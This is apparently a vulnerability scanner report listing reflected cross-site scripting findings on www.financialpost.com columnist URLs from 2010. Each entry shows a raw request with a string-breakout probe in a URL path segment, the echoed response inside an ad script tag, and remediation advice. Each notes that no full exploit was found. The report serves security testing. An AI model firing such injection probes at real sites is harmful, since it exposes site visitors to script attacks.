The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b1998'%3bdad09d492bc was submitted in the REST URL parameter 1. This input was echoed as b1998';dad09d492bc in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinionb1998'%3bdad09d492bc/columnists/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37548
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7773e'%3bee2319eb393 was submitted in the REST URL parameter 2. This input was echoed as 7773e';ee2319eb393 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnists7773e'%3bee2319eb393/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44176
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f06c4'%3ba01e7d2f0a9 was submitted in the REST URL parameter 1. This input was echoed as f06c4';a01e7d2f0a9 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinionf06c4'%3ba01e7d2f0a9/columnists/Diabetes+RDSP+confusion/3996673/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 78746
Expires: Sun, 19 Dec 2010 03:13:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:20 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinionf06c4';a01e7d2f0a9/columnists/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinionf06c4';a01e7d2f0a9;kw=columnists;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=94765539?">
...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 10172'%3be803ff19434 was submitted in the REST URL parameter 2. This input was echoed as 10172';e803ff19434 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnists10172'%3be803ff19434/Diabetes+RDSP+confusion/3996673/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 78669
Expires: Sun, 19 Dec 2010 03:13:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:29 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnists10172';e803ff19434/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnists10172';e803ff19434;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=99836883?">
...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ebf31'%3b503052c6ac3 was submitted in the REST URL parameter 4. This input was echoed as ebf31';503052c6ac3 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnists/Diabetes+RDSP+confusion/3996673ebf31'%3b503052c6ac3/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 64067
Expires: Sun, 19 Dec 2010 03:13:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:39 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnists/diabetes-rdsp-confusion/3996673ebf31';503052c6ac3/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnists;kw=diabetes-rdsp-confusion;kw=3996673ebf31';503052c6ac3;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag
...[SNIP]...
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e6915'%3bc70b98c8ed7 was submitted in the REST URL parameter 5. This input was echoed as e6915';c70b98c8ed7 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnists/Diabetes+RDSP+confusion/3996673/e6915'%3bc70b98c8ed7 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:13:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44167
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6aacf'%3b2dcc50d2bea was submitted in the REST URL parameter 1. This input was echoed as 6aacf';2dcc50d2bea in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion6aacf'%3b2dcc50d2bea/columnists/Gordon+Brown+fairy+tale/3996686/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 81434
Expires: Sun, 19 Dec 2010 03:13:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:20 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion6aacf';2dcc50d2bea/columnists/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion6aacf';2dcc50d2bea;kw=columnists;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=35050549?">
...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ee06'%3bd1610b97601 was submitted in the REST URL parameter 2. This input was echoed as 6ee06';d1610b97601 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnists6ee06'%3bd1610b97601/Gordon+Brown+fairy+tale/3996686/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 76267
Expires: Sun, 19 Dec 2010 03:13:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:28 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnists6ee06';d1610b97601/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnists6ee06';d1610b97601;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=74713967?">
...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b5d84'%3b589204317ff was submitted in the REST URL parameter 4. This input was echoed as b5d84';589204317ff in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnists/Gordon+Brown+fairy+tale/3996686b5d84'%3b589204317ff/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 70018
Expires: Sun, 19 Dec 2010 03:13:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:40 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnists/gordon-brown-fairy-tale/3996686b5d84';589204317ff/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnists;kw=gordon-brown-fairy-tale;kw=3996686b5d84';589204317ff;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag
...[SNIP]...
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8d99'%3b477af5f2dc was submitted in the REST URL parameter 5. This input was echoed as b8d99';477af5f2dc in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnists/Gordon+Brown+fairy+tale/3996686/b8d99'%3b477af5f2dc HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:13:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44189
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload caad9'%3bfe560cef6f1 was submitted in the REST URL parameter 1. This input was echoed as caad9';fe560cef6f1 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinioncaad9'%3bfe560cef6f1/columnists/Hoping+Santa+puts+inflation+stocking/3996670/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 81153
Expires: Sun, 19 Dec 2010 03:13:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:26 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinioncaad9';fe560cef6f1/columnists/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinioncaad9';fe560cef6f1;kw=columnists;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=94873299?">
...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4fea'%3bac5e157b03 was submitted in the REST URL parameter 2. This input was echoed as a4fea';ac5e157b03 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnistsa4fea'%3bac5e157b03/Hoping+Santa+puts+inflation+stocking/3996670/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 75080
Expires: Sun, 19 Dec 2010 03:13:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:35 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnistsa4fea';ac5e157b03/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnistsa4fea';ac5e157b03;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=13084670?">
...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a83e8'%3b1465d38c955 was submitted in the REST URL parameter 4. This input was echoed as a83e8';1465d38c955 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnists/Hoping+Santa+puts+inflation+stocking/3996670a83e8'%3b1465d38c955/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 71352
Expires: Sun, 19 Dec 2010 03:13:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:47 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnists/hoping-santa-puts-inflation-stocking/3996670a83e8';1465d38c955/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnists;kw=hoping-santa-puts-inflation-stocking;kw=3996670a83e8';1465d38c955;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTa
...[SNIP]...
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload faabd'%3b92cf6eecfea was submitted in the REST URL parameter 5. This input was echoed as faabd';92cf6eecfea in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnists/Hoping+Santa+puts+inflation+stocking/3996670/faabd'%3b92cf6eecfea HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:14:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:04 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44507
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ad4f'%3be55a38084cf was submitted in the REST URL parameter 1. This input was echoed as 8ad4f';e55a38084cf in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion8ad4f'%3be55a38084cf/columnists/Retired+forgotten/3996666/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 82077
Expires: Sun, 19 Dec 2010 03:14:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:03 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
